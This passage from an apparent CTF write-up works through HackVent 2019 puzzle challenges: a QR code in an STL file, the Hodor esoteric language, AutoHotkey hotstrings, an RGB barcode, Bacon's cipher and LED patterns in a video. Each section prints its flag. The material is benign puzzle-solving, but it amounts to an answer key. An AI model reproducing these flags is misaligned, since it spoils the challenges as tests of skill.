print('\\n'.join(lines[i:i+7]))\nprint('endsolid')<\/pre><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/02# .\/extractQR.py &gt; qrcode.stl<\/pre>\n<br\/>The resulting model looks like this (QR code moved to the center and color turned to black):\n<br\/>\n<br\/><img decoding=\"async\" 
src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/02_03_qrcode.png\" \/>\n<br\/>\n<br\/>The QR code can for example be scanned using <a href=\"https:\/\/zxing.org\/w\/decode.jspx\" rel=\"noopener noreferrer\" target=\"_blank\">zxing.org<\/a>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/02_04_scanned_qrcode.png\" \/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{Cr4ck_Th3_B411!}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.03\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.03 &#8211; Hodor,&nbsp;Hodor,&nbsp;Hodor<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_03.png\" \/><\/td><td style=\"color:#333333\">Author: otaku feat. trolli101<\/td><\/tr><tr><td colspan=\"2\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/03_01_hodor.jpg\" \/>\n<br\/><pre style=\"white-space:pre-wrap;\">$HODOR: hhodor. Hodor. Hodor!?  = `hodor?!? HODOR!? hodor? Hodor oHodor. hodor? , HODOR!?! ohodor!?  dhodor? hodor odhodor? d HodorHodor  Hodor!? HODOR HODOR? hodor! hodor!? HODOR hodor! hodor? ! \n<br\/>hodor?!? Hodor  Hodor Hodor? Hodor  HODOR  rhodor? HODOR Hodor!?  h4Hodor?!? Hodor?!? 0r hhodor?  Hodor!? oHodor?! hodor? Hodor  Hodor! HODOR Hodor hodor? 64 HODOR Hodor  HODOR!? hodor? Hodor!? Hodor!? .\n<br\/>HODOR?!? hodor- hodorHoOodoOor Hodor?!? OHoOodoOorHooodorrHODOR hodor. oHODOR... Dhodor- hodor?! HooodorrHODOR HoOodoOorHooodorrHODOR RoHODOR... HODOR!?! 1hodor?! HODOR... DHODOR- HODOR!?! HooodorrHODOR Hodor- HODORHoOodoOor HODOR!?! HODOR... DHODORHoOodoOor hodor. Hodor! HoOodoOorHodor HODORHoOodoOor 0Hooodorrhodor HoOodoOorHooodorrHODOR 0=`;\n<br\/>hodor.hod(hhodor. Hodor. Hodor!? 
);<\/pre><\/td><\/tr><\/tbody><\/table>\n<br\/>Googling for <code>hodor language<\/code> reveals this page: <a href=\"http:\/\/www.hodor-lang.org\/\" rel=\"noopener noreferrer\" target=\"_blank\">www.hodor-lang.org<\/a>.\n<br\/>\n<br\/>Accordingly we only have to install the npm package <code>hodor-lang<\/code> &#8230;\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/03# npm install -g hodor-lang\n\/usr\/local\/bin\/hodor -&gt; \/usr\/local\/lib\/node_modules\/hodor-lang\/bin\/hodor\n\/usr\/local\/bin\/js2hd -&gt; \/usr\/local\/lib\/node_modules\/hodor-lang\/bin\/js2hd\n+ hodor-lang@1.0.2\nadded 54 packages from 41 contributors in 2.283s<\/pre>\n<br\/>&#8230; and run the provided program:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/03# hodor hv03.hd \nHODOR: \\-&gt; hv03.hd\nAwesome, you decoded Hodors language! 
\n\nAs sis a real h4xx0r he loves base64 as well.\n\nSFYxOXtoMDFkLXRoMy1kMDByLTQyMDQtbGQ0WX0=<\/pre>\n<br\/>Base64-decoding the output string yields the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/03# echo SFYxOXtoMDFkLXRoMy1kMDByLTQyMDQtbGQ0WX0=|base64 -d\nHV19{h01d-th3-d00r-4204-ld4Y}<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{h01d-th3-d00r-4204-ld4Y}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.04\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.04 &#8211; password&nbsp;policy&nbsp;circumvention<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_04.png\" \/><\/td><td style=\"color:#333333\">Author: DanMcFly<\/td><\/tr><tr><td colspan=\"2\">Santa released a new password policy (more than 40 characters, upper, lower, digit, special).\n<br\/>\n<br\/>The elves can&#8217;t remember such long passwords, so they found a way to continue to use their old (bad) password:\n<br\/><pre style=\"white-space:pre-wrap;font-size:16px;\">merry christmas geeks<\/pre><span class=\"link\">HV19-PPC.zip<\/span>\n<br\/><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided zip archive contains a AutoHotkey file (<code>.ahk<\/code>):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/04# unzip 6473254e-1cb3-444e-9dac-5baeaaaf6d11.zip \nArchive:  6473254e-1cb3-444e-9dac-5baeaaaf6d11.zip\n  inflating: HV19-PPC.ahk            \nroot@kali:~\/hv19\/04# file HV19-PPC.ahk \nHV19-PPC.ahk: UTF-8 Unicode (with BOM) text, with CRLF line terminators\nroot@kali:~\/hv19\/04# cat HV19-PPC.ahk \n::merry::\nFormatTime , x,, MM MMMM yyyy\nSendInput, %x%{left 4}{del 2}+{right 2}^c{end}{home}^v{home}V{right 2}{ASC 
00123}\nreturn\n\n::christmas::\nSendInput HV19-pass-w0rd\nreturn\n\n:*?:is::\nSend - {del}{right}4h\n\n:*?:as::\nSend {left 8}rmmbr{end}{ASC 00125}{home}{right 10}\nreturn\n\n:*?:ee::\nSend {left}{left}{del}{del}{left},{right}e{right}3{right 2}e{right}{del 5}{home}H{right 4}\nreturn\n\n:*?:ks::\nSend {del}R3{right}e{right 2}3{right 2} {right 8} {right} the{right 3}t{right} 0f{right 3}{del}c{end}{left 5}{del 4}\nreturn\n\n::xmas::\nSendInput, -Hack-Vent-Xmas\nreturn\n\n::geeks::\nSend -1337-hack\nreturn<\/pre>\n<br\/>The file defines hotkeys \/ hotstrings which can be used with the software <a href=\"https:\/\/www.autohotkey.com\/\" rel=\"noopener noreferrer\" target=\"_blank\">AutoHotkey<\/a>.\n<br\/>\n<br\/>When entering the password <code>merry christmas geeks<\/code> different hotstrings defined within the file are matched and the hotstrings are replaced with the corresponding key strokes.\n<br\/>\n<br\/>If we don&#8217;t want to carry out the replacement on our own, the easiest way is to simply install AutoHotkey, load the script and enter the password.\n<br\/>\n<br\/>After installing AutoHotkey on a windows machine, we can simply double-click the <code>.ahk<\/code> file in order to load the script.\n<br\/>\n<br\/>Now we can open notepad and enter the password. One thing to notice here is that we have to wait for each replacement to be finished. Otherwise the resulting string (the flag) gets messed up because our key strokes are interpreted before the replacing key strokes were finished. 
Thus we enter:\n<br\/>\n<br\/><code>merry [PAUSE]chris[PAUSE]tmas[PAUSE] gee[PAUSE]ks<\/code>\n<br\/>\n<br\/>Result after entering <code>\"merry \"<\/code>:\n<br\/>\n<br\/><code>V19{12 December 19<\/code>\n<br\/>\n<br\/>Continuing with <code>\"chris\"<\/code>:\n<br\/>\n<br\/><code>V19{rmmbrchr- 24h December 19}<\/code>\n<br\/>\n<br\/>Followed by <code>\"tmas\"<\/code>:\n<br\/>\n<br\/><code>V19{rmmbrrmmbrctmhr- 24h December 19}}<\/code>\n<br\/>\n<br\/>Going on with <code>\" gee\"<\/code>:\n<br\/>\n<br\/><code>HV19{rmmbr,rem3mber- 24h December 19}}<\/code>\n<br\/>\n<br\/>Finishing with <code>\"ks\"<\/code>:\n<br\/>\n<br\/><code>HV19{R3memb3r, rem3mber - the 24th 0f December}<\/code>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{R3memb3r, rem3mber &#8211; the 24th 0f December}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.05\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.05 &#8211; Santa&nbsp;Parcel&nbsp;Tracking<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_05.png\" \/><\/td><td style=\"color:#333333\">Author: inik<\/td><\/tr><tr><td colspan=\"2\">To handle the huge load of parcels Santa introduced this year a parcel tracking system. He didn&#8217;t like the black and white barcode, so he invented a more solemn barcode. Unfortunately the common barcode readers can&#8217;t read it anymore, it only works with the pimped models santa owns. 
Can you read the barcode?\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/05_01_barcode.png\" \/>\n<br\/><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided barcode can for example be scanned using <a href=\"https:\/\/zxing.org\/w\/decode.jspx\" rel=\"noopener noreferrer\" target=\"_blank\">zxing.org<\/a>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/05_02_scan_barcode.png\" \/>\n<br\/>\n<br\/>Though this is obviously <i>Not the solution<\/i>.\n<br\/>\n<br\/>Just by viewing the barcode, we can see that the color of each bar is slightly different.\n<br\/>\n<br\/>In order to inspect the exact values, we can write a python script which prints the RGB value of each bar by iterating through a horizontal line of pixels and printing the first value after a white pixel (<code>255,255,255<\/code>):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nfrom PIL import Image\n\nim = Image.open('code.png')\npix = im.load()\n\nlastWhite = False\n\nfor w in range(im.size[0]):\n  p = pix[w,10]\n  if (p != (255,255,255)):\n    if (lastWhite):\n      lastWhite = False\n      print(p)\n  else:\n    lastWhite = True<\/pre>\n<br\/>Running the script outputs the RGB value of each bar:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">\nroot@kali:~\/hv19\/05# .\/extract.py \n(115, 80, 88)\n(116, 89, 56)\n(108, 80, 89)\n(109, 69, 73)\n(114, 49, 79)\n(121, 51, 70)\n(115, 80, 48)\n(101, 81, 90)\n(103, 56, 80)\n(122, 57, 52)\n(117, 76, 83)\n(104, 84, 56)\n...\n<\/pre>\n<br\/>The value for black would be <code>(0,0,0)<\/code>, but these values are considerably higher. Moreover, they look suspiciously like they all lie within the ASCII range. 
Accordingly, let&#8217;s extract the value for each channel (<code>R,G,B<\/code>) and see if we can find something useful if we interpret the values as ASCII characters. In order to do this, only a slight adjustment of the former script is required:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nfrom PIL import Image\n\nim = Image.open('code.png')\npix = im.load()\n\nlastWhite = False\nr = ''; g = ''; b = ''\nfor w in range(im.size[0]):\n  p = pix[w,10]\n  if (p != (255,255,255)):\n    if (lastWhite):\n      lastWhite = False\n      r += chr(p[0])\n      g += chr(p[1])\n      b += chr(p[2])\n  else:\n    lastWhite = True\n\nprint(r)\nprint(g)\nprint(b)<\/pre>\n<br\/>Running the script &#8230;\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/05# .\/extractASCII.py \nstlmrysegzuhezagltlgxzgjiivvssaiewbtuhalqclfqrcwfqvengxekoaltyve\nPYPE13PQ89LTG0X0OOJJIIUSHQ60MIQI4S9EG48NVVP65GOXL0VWJW2323SRU8BB\nX8YIOF0ZP4S8HV19{D1fficult_to_g3t_a_SPT_R3ader}S1090OMZE0E3NFP6E\n<\/pre>\n<br\/>&#8230; actually yields the flag within the <code>B<\/code> channel!\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{D1fficult_to_g3t_a_SPT_R3ader}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.06\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.06 &#8211; bacon&nbsp;and&nbsp;eggs<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_06.png\" \/><\/td><td style=\"color:#333333\">Author: T.B.<\/td><\/tr><tr><td colspan=\"2\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/06_01_bacon.jpg\" \/>\n<br\/><p style=\"font-style:normal;\"><i>F<\/i>ra<i>n<\/i>cis Baco<i>n<\/i> <i>w<\/i>a<i>s<\/i> <i>a<\/i>n 
E<i>ng<\/i>lish ph<i>i<\/i>l<i>os<\/i>o<i>p<\/i>her a<i>n<\/i>d <i>s<\/i>tat<i>e<\/i>sm<i>a<\/i>n w<i>h<\/i>o se<i>rve<\/i>d <i>a<\/i>s At<i>t<\/i>or<i>n<\/i>ey Gen<i>e<\/i>ral and as <i>L<\/i>or<i>d<\/i> <i>Ch<\/i>an<i>ce<\/i>l<i>l<\/i>or of <i>En<\/i>g<i>l<\/i>an<i>d<\/i>. Hi<i>s<\/i> <i>w<\/i>orks ar<i>e<\/i> c<i>red<\/i>it<i>e<\/i>d w<i>ith<\/i> d<i>e<\/i>ve<i>lo<\/i>pi<i>ng<\/i> <i>t<\/i>h<i>e<\/i> sci<i>e<\/i>nt<i>i<\/i>fic me<i>t<\/i>hod and re<i>m<\/i>ai<i>ned<\/i> in<i>fl<\/i>u<i>en<\/i>ti<i>al<\/i> th<i>rou<\/i>gh <i>t<\/i>he s<i>cien<\/i>tific <i>r<\/i>ev<i>o<\/i>l<i>u<\/i>ti<i>o<\/i>n.\n<br\/><i>B<\/i>a<i>co<\/i>n h<i>as<\/i> <i>b<\/i>e<i>e<\/i>n ca<i>l<\/i>led <i>th<\/i>e <i>f<\/i>ath<i>e<\/i>r o<i>f<\/i> emp<i>iric<\/i>i<i>s<\/i>m. <i>Hi<\/i>s <i>wor<\/i>ks ar<i>g<\/i>ued for th<i>e<\/i> po<i>ssi<\/i>bi<i>li<\/i>t<i>y<\/i> of s<i>c<\/i>ie<i>n<\/i>tifi<i>c<\/i> <i>kno<\/i>wl<i>edg<\/i>e b<i>a<\/i>se<i>d<\/i> onl<i>y<\/i> u<i>p<\/i>on i<i>n<\/i>du<i>c<\/i>t<i>i<\/i>ve <i>r<\/i>ea<i>s<\/i>onin<i>g<\/i> <i>a<\/i>nd c<i>aref<\/i>u<i>l<\/i> o<i>bs<\/i>er<i>v<\/i>ation o<i>f<\/i> <i>e<\/i>v<i>e<\/i>nt<i>s<\/i> in <i>na<\/i>tur<i>e<\/i>. Mo<i>st<\/i> <i>i<\/i>mp<i>ort<\/i>an<i>t<\/i>l<i>y<\/i>, <i>he<\/i> a<i>rgue<\/i>d sc<i>i<\/i>en<i>c<\/i>e co<i>uld<\/i> <i>b<\/i>e <i>a<\/i>c<i>hi<\/i>eved by us<i>e<\/i> of a <i>s<\/i>ce<i>p<\/i>t<i>ical<\/i> a<i>nd<\/i> me<i>t<\/i>hod<i>i<\/i>ca<i>l<\/i> <i>a<\/i>pp<i>roa<\/i>ch wh<i>er<\/i>eby <i>s<\/i>cientist<i>s<\/i> ai<i>m<\/i> t<i>o<\/i> avo<i>i<\/i>d m<i>i<\/i>sl<i>ead<\/i>in<i>g<\/i> themsel<i>ve<\/i>s. 
<i>A<\/i>lth<i>oug<\/i>h <i>h<\/i>is <i>p<\/i>ra<i>c<\/i>tic<i>a<\/i>l i<i>d<\/i>e<i>a<\/i>s ab<i>out<\/i> <i>s<\/i>u<i>ch<\/i> <i>a<\/i> <i>m<\/i>et<i>h<\/i>od, <i>t<\/i>he B<i>a<\/i>con<i>i<\/i>an meth<i>o<\/i>d, d<i>i<\/i>d no<i>t<\/i> have <i>a<\/i> l<i>o<\/i>n<i>g<\/i>&#8211;<i>la<\/i>s<i>t<\/i>ing <i>i<\/i>nfluen<i>c<\/i>e, <i>th<\/i>e <i>g<\/i>e<i>ne<\/i>ral <i>i<\/i>dea <i>of<\/i> <i>t<\/i>he imp<i>o<\/i>rta<i>n<\/i>ce and pos<i>s<\/i>i<i>b<\/i>il<i>it<\/i>y o<i>f<\/i> a s<i>c<\/i>ept<i>i<\/i>cal methodology makes Bacon the father of the scientific method. This method was a new rhetorical and theoretical framework for science, the practical details of which are still central in debates about science and methodology.\n<br\/>\n<br\/>Bacon was the first recipient of the Queen&#8217;s counsel designation, which was conferred in 1597 when Elizabeth I of England reserved Bacon as her legal advisor. After the accession of James VI and I in 1603, Bacon was knighted. He was later created Baron Verulam in 1618 and Viscount St. Alban in 1621.\n<br\/>Because he had no heirs, both titles became extinct upon his death in 1626, at 65 years. Bacon died of pneumonia, with one account by John Aubrey stating that he had contracted the condition while studying the effects of freezing on the preservation of meat. 
He is buried at St Michael&#8217;s Church, St Albans, Hertfordshire.\n<br\/><pre>\n<br\/>Born: January 22\t     \t \t   \t   \t \t       \t     \t  \t  \n<br\/>Died: April 9   \t  \t \t    \t  \t      \t   \t\t  \t  \n<br\/>Mother: Lady Anne   \t\t \t   \t   \t      \t  \t      \t  \n<br\/>Father: Sir Nicholas\t \t      \t\t    \t    \t  \t  \t      \t      \n<br\/>Secrets: unknown      \t \t  \t \t    \t    \t   \t       \t  \n<br\/><\/pre><\/p><\/td><\/tr><\/tbody><\/table>\n<br\/>The challenge is in the crypto category and the mentioned <a href=\"https:\/\/en.wikipedia.org\/wiki\/Francis_Bacon\" rel=\"noopener noreferrer\" target=\"_blank\">Francis Bacon<\/a> devised a cipher called <a href=\"https:\/\/en.wikipedia.org\/wiki\/Bacon%27s_cipher\" rel=\"noopener noreferrer\" target=\"_blank\">Bacon&#8217;s cipher<\/a>.\n<br\/>\n<br\/>The Bacon&#8217;s cipher maps 5-bit on a single letter (eg. <code>01010 --> K<\/code>). These bits can be encoded within a text by using different font-styles for subsequent letters. An emphasized letter is mapped to <code>1<\/code> and a non-emphasized letter to <code>0<\/code>. Applying this to the above text the first letter (<code>F<\/code>) is emphasized (&#8211;> <code>1<\/code>), the next two letters (<code>ra<\/code>) are not (&#8211;> <code>100<\/code>), the next one (<code>n<\/code>) is emphasized again (&#8211;> <code>1001<\/code>) and so forth.\n<br\/>\n<br\/>Notice that we have to remove any non-alpha characters from the text beforehand. The following python script reads the input text (stored in <code>text.txt<\/code>) and separates the text in emphasized and non-emphasized letters by splitting it using the <code>&lt;em&gt;<\/code> and <code>&lt;\/em&gt;<\/code> tags. After this all non-alpha characters are removed and the emphasized and non-emphasized letters are replaced with <code>1<\/code> and <code>0<\/code>. 
Finally a space is inserted after each 5 bits:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nimport re\n\ntxt = open('text.txt').read()\n# use a '0' as separator\ntxt = txt.replace('&lt;em&gt;','0').replace('&lt;\/em&gt;','0')\n# remove all non letter chars (also keep separator)\ntxt = re.sub('[^a-zA-Z0]', '', txt)\n\n# split by separator\na = txt.split('0')[1:]\nct = ''\nfor i in range(len(a)):\n  if (i%2 == 0): ct += '1'*len(a[i])\n  else: ct += '0'*len(a[i])\n\nct = re.sub('(.{5})', '\\\\1 ', ct, 0, re.DOTALL)\nprint(ct)<\/pre>\n<br\/>Running the script yields the ciphertext:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/06# .\/extract.py \n10010 00000 01101 10011 00000 01011 01000 01010 00100 10010 00111 01000 10010 00001 00000 00010 01110 01101 00001 10100 10011 00000 01011 10010 01110 10011 00111 01000 10010 00001 00000 00010 01110 01101 10011 00111 00100 01111 00000 10010 10010 10110 01110 10001 00011 01000 10010 00111 10101 10111 00001 00000 00010 01110 01101 00010 01000 01111 00111 00100 10001 01000 10010 10010 01000 01100 01111 01011 00100 00001 10100 10011 00010 01110 01110 01011 10111 10001 00100 01111 01011 00000 00010 00100 10111 10110 01000 10011 00111 00001 10001 00000 00010 01010 00100 10011 10010 00000 01101 00011 10100 10010 00100 10100 01111 01111 00100 10001 00010 00000 10010 00100 00101 01110 10001 00000 01011 01011 00010 00111 00000 10001 00000 00010 10011 00100 10001 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000\n<\/pre>\n<br\/>The end of the text does not contain actual ciphertext anymore, which means that we can ignore the <code>00000<\/code> at the 
end.\n<br\/>\n<br\/>Now we can for example use <a href=\"https:\/\/gchq.github.io\/CyberChef\/\" rel=\"noopener noreferrer\" target=\"_blank\">CyberChef<\/a> to decrypt the ciphertext:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/06_02_cyberchef.png\" \/>\n<br\/>\n<br\/>The plaintext is <code>SANTALIKESHISBACONBUTALSOTHISBACONTHEPASSWORDISHVXBACONCIPHERISSIMPLEBUTCOOLXREPLACEXWITHBRACKETSANDUSEUPPERCASEFORALLCHARACTER<\/code>.\n<br\/>\n<br\/>Please notice that we also have to insert <code>19<\/code> after <code>HV<\/code> at the beginning of the flag.\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{BACONCIPHERISSIMPLEBUTCOOL}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.07\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.07 &#8211; Santa&nbsp;Rider<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_07.png\" \/><\/td><td style=\"color:#333333\">Author: inik<\/td><\/tr><tr><td colspan=\"2\">Santa is prototyping a new gadget for his sledge. 
Unfortunately it still has some glitches, but look for yourself.\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/07_01_movie.png\" \/>\n<br\/>\n<br\/>For easy download, get it here: <span class=\"link\">HV19-SantaRider.zip<\/span><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided zip archive contains the mp4 video visible in the above screenshot:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/07# unzip 3dbe0c12-d794-4f79-ae67-09ac27bd099d.zip\nArchive:  3dbe0c12-d794-4f79-ae67-09ac27bd099d.zip\n  inflating: 3DULK2N7DcpXFg8qGo9Z9qEQqvaEDpUCBB1v.mp4\nroot@kali:~\/hv19\/07# file 3DULK2N7DcpXFg8qGo9Z9qEQqvaEDpUCBB1v.mp4\n3DULK2N7DcpXFg8qGo9Z9qEQqvaEDpUCBB1v.mp4: ISO Media, MP4 Base Media v1 [IS0 14496-12:2003]<\/pre>\n<br\/>At the beginning and the end of the video, the LEDs light up one after another in a smooth rhythm. Though in the middle of the video, different LEDs are lighting up in a quick transition.\n<br\/>\n<br\/>In order to inspect the patterns in which the LEDs are lighting up, we start by extracting all frames of the video using <code>ffmpeg<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/07# ffmpeg -ss 00:00 -i 3DULK2N7DcpXFg8qGo9Z9qEQqvaEDpUCBB1v.mp4 -t 23:00 mov%05d.png\nffmpeg version 4.1.3-1 Copyright (c) 2000-2019 the FFmpeg developers\n  built with gcc 8 (Debian 8.3.0-7)\n  configuration: --prefix=\/usr --extra-version=1 --toolchain=hardened ...\n  libavutil      56. 22.100 \/ 56. 22.100\n  libavcodec     58. 35.100 \/ 58. 35.100\n  libavformat    58. 20.100 \/ 58. 20.100\n  libavdevice    58.  5.100 \/ 58.  5.100\n  libavfilter     7. 40.101 \/  7. 40.101\n  libavresample   4.  0.  0 \/  4.  0.  0\n  libswscale      5.  3.100 \/  5.  3.100\n  libswresample   3.  3.100 \/  3.  
3.100\n  libpostproc    55.  3.100 \/ 55.  3.100\nInput #0, mov,mp4,m4a,3gp,3g2,mj2, from '3DULK2N7DcpXFg8qGo9Z9qEQqvaEDpUCBB1v.mp4':\n  Metadata:\n    major_brand     : isom\n    minor_version   : 512\n    compatible_brands: isomiso2avc1mp41\n    encoder         : Lavf58.20.100\n  Duration: 00:00:22.59, start: 0.000000, bitrate: 925 kb\/s\n    Stream #0:0(und): Video: h264 (High) (avc1 \/ 0x31637661), yuv420p(tv, bt709\/unknown\/bt709), 1280x720 [SAR 1:1 DAR 16:9], 914 kb\/s, 30 fps, 30 tbr, 15360 tbn, 60 tbc (default)\n    Metadata:\n      handler_name    : VideoHandler\n    Stream #0:1(und): Audio: aac (LC) (mp4a \/ 0x6134706D), 48000 Hz, stereo, fltp, 2 kb\/s (default)\n    Metadata:\n      handler_name    : SoundHandler\nStream mapping:\n  Stream #0:0 -&gt; #0:0 (h264 (native) -&gt; png (native))\nPress [q] to stop, [?] for help\nOutput #0, image2, to 'mov%05d.png':\n  Metadata:\n    major_brand     : isom\n    minor_version   : 512\n    compatible_brands: isomiso2avc1mp41\n    encoder         : Lavf58.20.100\n    Stream #0:0(und): Video: png, rgb24, 1280x720 [SAR 1:1 DAR 16:9], q=2-31, 200 kb\/s, 30 fps, 30 tbn, 30 tbc (default)\n    Metadata:\n      handler_name    : VideoHandler\n      encoder         : Lavc58.35.100 png\nframe=  677 fps= 13 q=-0.0 Lsize=N\/A time=00:00:22.56 bitrate=N\/A speed=0.422x\nvideo:479218kB audio:0kB subtitle:0kB other streams:0kB global headers:0kB muxing overhead: unknown<\/pre>\n<br\/>Now we can calmly inspect each frame. The irregular lighting begins approximately at frame 272:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/07_02_frames.png\" \/>\n<br\/>\n<br\/>Since there are 8 LEDs, it seems likely that each LED represents a single bit of a byte. The first lighting pattern is <code>01001000<\/code>, which is ASCII for <code>H<\/code>. The next is <code>01010110<\/code>, which in turn is ASCII for <code>V<\/code>. 
This should be the flag \ud83d\ude42 Thus let&#8217;s write down all patterns (also writing down the frame number helps <i>debugging<\/i> if a single character seems wrong):\n<br\/><pre>\n<br\/>01001000      272\n<br\/>01010110      275\n<br\/>00110001      280\n<br\/>00111001      283\n<br\/>01111011      286\n<br\/>00110001      290\n<br\/>01101101      293\n<br\/>01011111      295\n<br\/>01100001      298\n<br\/>01101100      301\n<br\/>01110011      304\n<br\/>00110000      307\n<br\/>01011111      311\n<br\/>01110111      314\n<br\/>00110000      317\n<br\/>01110010      319\n<br\/>01101011      323\n<br\/>00110001      326\n<br\/>01101110      329\n<br\/>01100111      332\n<br\/>01011111      335\n<br\/>00110000      338\n<br\/>01101110      340\n<br\/>01011111      344\n<br\/>01100001      347\n<br\/>01011111      350\n<br\/>01110010      354\n<br\/>00110011      356\n<br\/>01101101      358\n<br\/>00110000      361\n<br\/>01110100      365\n<br\/>00110011      367\n<br\/>01011111      371\n<br\/>01100011      374\n<br\/>00110000      376\n<br\/>01101110      380\n<br\/>01110100      383\n<br\/>01110010      385\n<br\/>00110000      389\n<br\/>01101100      391\n<br\/>01111101      394\n<br\/><\/pre>After writing down all patterns, the following python script extracts the bit string of each line creating an ASCII string:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nlines = open('flag.txt').read().split('\\n')\nfl = ''\nfor line in lines[:-1]:\n  bitstr = line.split(' ')[0]\n  fl += chr(int(bitstr,2))\nprint(fl)<\/pre>\n<br\/>Running the script yields the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/07# .\/printFlag.py\nHV19{1m_als0_w0rk1ng_0n_a_r3m0t3_c0ntr0l}\n<\/pre>\n<br\/>The flag is <span 
class=\"spanFlag\">HV19{1m_als0_w0rk1ng_0n_a_r3m0t3_c0ntr0l}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.08\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.08 &#8211; SmileNcryptor&nbsp;4.0<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_08.png\" \/><\/td><td style=\"color:#333333\">Author: otaku<\/td><\/tr><tr><td colspan=\"2\">You hacked into the system of very-secure-shopping.com and you found a SQL-Dump with $$-creditcards numbers. As a good hacker you inform the company from which you got the dump. The managers tell you that they don&#8217;t worry, because the data is encrypted.\n<br\/>\n<br\/>Dump-File: <span class=\"link\">dump.zip<\/span>\n<br\/>\n<br\/>Analyze the 